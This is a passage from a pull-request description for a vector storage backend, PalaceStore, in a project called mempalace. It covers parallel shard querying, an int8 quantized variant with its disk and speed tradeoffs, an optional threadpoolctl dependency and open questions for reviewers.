parallel_query=Truethe store lazy-creates aThreadPoolExecutorand dispatches shards across workers. Gated onlen(wings) ≥ 4to avoid the ~100 µs per-task dispatch overhead hurting small-scale queries.max_workersdefaults tomin(8, cpu_count)because shard-level matmul is memory-bandwidth bound past ~6 concurrent sgemvs. Stacks on top of the BLAS-limit win to give ~2× additional speedup at 100k+ unfiltered queries.int8 quantized variant.
PalaceStore(..., dtype="int8")stores per-row-scale quantized vectors — 4× smaller on disk, ~2× slower queries (numpy has no BLAS int8 path), 99.1% top-k overlap with exact cosine on random unit vectors. Honest disk/speed tradeoff, not a recall claim.What's in the PR
How to try it
Intentional non-goals / deferred
Dependencies
One new optional dependency:
threadpoolctl>=3.1via thepalace-parallelextra. Used to scope BLAS thread count inside PalaceStore's query path. Without it, palace_store still runs but emits a one-shot warning because it can't apply the 3-4× BLAS-limit speedup. No hard dependencies added to the core package.Open questions for reviewers
palace_storeas a top-level package sibling ofmempalace, or nested insidemempalace/storage/? Current choice: top-level, because the library is independently usable and shouldn't leak mempalace internals.MEMPAL_STORAGEunset default tochromadb(current, zero-risk) or auto-detect based on which packages are installed? Current leans conservative.Test plan
mempalace mine <dir>on both backends